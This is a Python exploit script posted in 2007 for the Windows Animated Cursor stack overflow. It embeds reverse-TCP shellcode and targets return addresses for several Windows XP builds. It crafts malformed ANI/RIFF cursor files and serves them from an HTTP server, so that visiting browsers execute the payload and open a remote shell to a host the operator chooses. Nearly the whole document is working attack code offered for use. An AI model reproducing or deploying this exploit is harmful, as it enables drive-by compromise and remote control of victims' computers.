Home / exploits mswin-anim.txt
Posted on 11 June 2007
#!/usr/bin/env python # # $Id: win32-loadaniicon.py 4 2007-06-02 00:47:59Z ramon $ # # Windows Animated Cursor Stack Overflow Exploit # Copyright 2007 Ramon de Carvalho Valle <ramon@risesecurity.org>, # RISE Security <contact@risesecurity.org> # # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 2 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA # # # Windows Animated Cursor Stack Overflow Vulnerability # http://www.determina.com/security.research/vulnerabilities/ani-header.html # from BaseHTTPServer import * from os.path import * from random import * from socket import * from string import * from struct import * from sys import * # # windows/shell_reverse_tcp - 287 bytes # http://www.metasploit.com # EXITFUNC=seh, LPORT=1234, LHOST=127.0.0.1 # buf = \n'xfcx6axebx4dxe8xf9xffxffxffx60x8bx6cx24x24x8b' + \n'x45x3cx8bx7cx05x78x01xefx8bx4fx18x8bx5fx20x01' + \n'xebx49x8bx34x8bx01xeex31xc0x99xacx84xc0x74x07' + \n'xc1xcax0dx01xc2xebxf4x3bx54x24x28x75xe5x8bx5f' + \n'x24x01xebx66x8bx0cx4bx8bx5fx1cx01xebx03x2cx8b' + \n'x89x6cx24x1cx61xc3x31xdbx64x8bx43x30x8bx40x0c' + \n'x8bx70x1cxadx8bx40x08x5ex68x8ex4ex0execx50xff' + \n'xd6x66x53x66x68x33x32x68x77x73x32x5fx54xffxd0' + \n'x68xcbxedxfcx3bx50xffxd6x5fx89xe5x66x81xedx08' + \n'x02x55x6ax02xffxd0x68xd9x09xf5xadx57xffxd6x53' + \n'x53x53x53x43x53x43x53xffxd0x68x7fx00x00x01x66' + \n'x68x04xd2x66x53x89xe1x95x68xecxf9xaax60x57xff' + \n'xd6x6ax10x51x55xffxd0x66x6ax64x66x68x63x6dx6a' + \n'x50x59x29xccx89xe7x6ax44x89xe2x31xc0xf3xaax95' + \n'x89xfdxfex42x2dxfex42x2cx8dx7ax38xabxabxabx68' + \n'x72xfexb3x16xffx75x28xffxd6x5bx57x52x51x51x51' + \n'x6ax01x51x51x55x51xffxd0x68xadxd9x05xcex53xff' + \n'xd6x6axffxffx37xffxd0x68xe7x79xc6x79xffx75x04' + \n'xffxd6xffx77xfcxffxd0x68xf0x8ax04x5fx53xffxd6' + \n'xffxd0' # Target list target = [ \n# call [ebx+4] # Microsoft Windows XP SP2 user32.dll (5.1.2600.2622) Multi Language {'addr': 0x25ba, 'len': 2, 'offset': 80}, # Microsoft Windows XP SP2 user32.dll (5.1.2600.2180) Multi Language {'addr': 0x25d0, 'len': 2, 'offset': 80}, # Microsoft Windows XP SP2 userenv.dll (5.1.2600.2180) English {'addr': 0x769fc81a, 'len': 4, 'offset': 80}, # Microsoft Windows XP SP2 user32.dll (5.1.2600.2180) English # {'addr': 0x77d825d0, 'len': 4, 'offset': 80}, # Microsoft Windows XP SP2 userenv.dll (5.1.2600.2180) Portuguese (Brazil) {'addr': 0x769dc81a, 'len': 4, 'offset': 80}, # Microsoft Windows XP SP2 user32.dll (5.1.2600.2180) Portuguese (Brazil) # {'addr': 0x77d625d0, 'len': 4, 'offset': 80}, # call [esi+4] # Microsoft Windows XP SP1a userenv.dll English {'addr': 0x75a758b1, 'len': 4, 'offset': 80}, # Microsoft Windows XP SP1a shell32.dll English # {'addr': 0x77441a66, 'len': 4, 'offset': 80}, # Microsoft Windows XP userenv.dll (5.1.2600.0) Portuguese (Brazil) {'addr': 0x75a4579b, 'len': 4, 'offset': 80}, # Microsoft Windows XP shell32.dll (6.0.2600.0) Portuguese (Brazil) # {'addr': 0x77427214, 'len': 4, 'offset': 80}, ] # Target list index tidx = 0 def randstr(count = 1, charset = 'ascii_alpha'): # Set the charset if charset == 'ascii_alpha': charset = digits + ascii_uppercase + ascii_lowercase elif charset == 'ascii_letters': charset = ascii_letters elif charset == 'ascii_lowercase': charset = ascii_lowercase elif charset == 'ascii_uppercase': charset = ascii_uppercase elif charset == 'digits': charset = digits elif charset == 'hexdigits': charset = hexdigits elif charset == 'octdigits': charset = octdigits # Create the string i = 0 str = '' while i < count: str = str + charset[randint(0, len(charset)-1)] i = i + 1 return str def riff_chunk(): chunk_id = randstr(4) chunk_data = randstr(randint(1, 256)*2) chunk_size = pack('<L', len(chunk_data)) return chunk_id + chunk_size + chunk_data def riff_ani_file(): global buf, target, tidx # Create the first header subchunk anih_a = [36, randint(1, 65535), randint(1, 65535), 0, 0, 0, 0, 0, 1] anih_a = pack('<%dL' % len(anih_a), *[i for i in anih_a]) anih_a = 'anih' + pack('<L', len(anih_a)) + anih_a # Create the second header subchunk anih_b = randstr(target[tidx]['offset']) # Set the current indexed target if target[tidx]['len'] == 1: anih_b = anih_b + pack('<B', target[tidx]['addr']) elif target[tidx]['len'] == 2: anih_b = anih_b + pack('<H', target[tidx]['addr']) else: anih_b = anih_b + pack('<L', target[tidx]['addr']) anih_b = 'anih' + pack('<L', len(anih_b)) + anih_b # Format ID riff = 'ACON' # Random subchunks for i in range(randint(1, 256)): riff = riff + riff_chunk() # First header subchunk riff = riff + anih_a # Random subchunks for i in range(randint(1, 256)): riff = riff + riff_chunk() # Second header subchunk riff = riff + anih_b # Shellcode riff = riff + buf # File ID and length of file riff = 'RIFF' + pack('<L', len(riff)) + riff # Update the target list index if tidx < len(target)-1: tidx = tidx + 1 else: tidx = 0 return riff def randhtml(): global buf, target, tidx # Random RIFF file extensions extension = ['ani', 'avi', 'cdr', 'rmi', 'wav'] # Random html document html = \n'<html> <head> <title>' + \nrandstr(randint(1, 256)) + \n'</title> </head> <body> ' for i in range(randint(0, 4)): html = html + randstr(randint(1, 256)) + ' ' for i in range(len(target)): html = html + \n'<div id="' + randstr(randint(4, 16)) + '" ' \n'style="cursor: url(/' + randstr(randint(4, 16)) + '.' + \nextension[randint(0, len(extension)-1)] + ')"> ' for i in range(randint(0, 4)): html = html + randstr(randint(1, 256)) + ' ' html = html + '</div> ' for i in range(randint(0, 4)): html = html + randstr(randint(1, 256)) + ' ' html = html + '</body> </html> ' return html class RequestHandler(BaseHTTPRequestHandler): def do_GET(self): self.send_response(200) if self.path == '/': # Send the html document html = randhtml() self.send_header('Content-Type', 'text/html; charset=UTF-8') self.send_header('Content-Length', str(len(html))) self.end_headers() self.wfile.write(html) return # Generate and send the RIFF file riff = riff_ani_file() self.send_header('Content-Type', 'application/octetstream') self.send_header('Content-Length', str(len(riff))) self.end_headers() self.wfile.write(riff) def usage(): print 'Usage: ./%s <http_host> <http_port> <host> <port>' \n% basename(argv[0]) if __name__ == '__main__': print 'Windows Animated Cursor Stack Overflow Exploit' print 'Copyright 2007 RISE Security <contact@risesecurity.org> ' args = argv[1:] if '-h' in args or '--help' in args: usage() exit() http_host = '0.0.0.0' http_port = 8080 host = '127.0.0.1' port = 1234 try: http_host = argv[1] http_port = atoi(argv[2]) host = argv[3] port = atoi(argv[4]) except: pass # Set shellcode host and port to connect to buf = buf[:160] + inet_aton(gethostbyname(host)) + buf[164:] buf = buf[:166] + pack('<H', port) + buf[168:] # Start the HTTP server server_class = HTTPServer httpd = server_class((http_host, http_port), RequestHandler) print 'Listening on %s:%s' % (http_host, http_port) try: httpd.serve_forever() except: pass
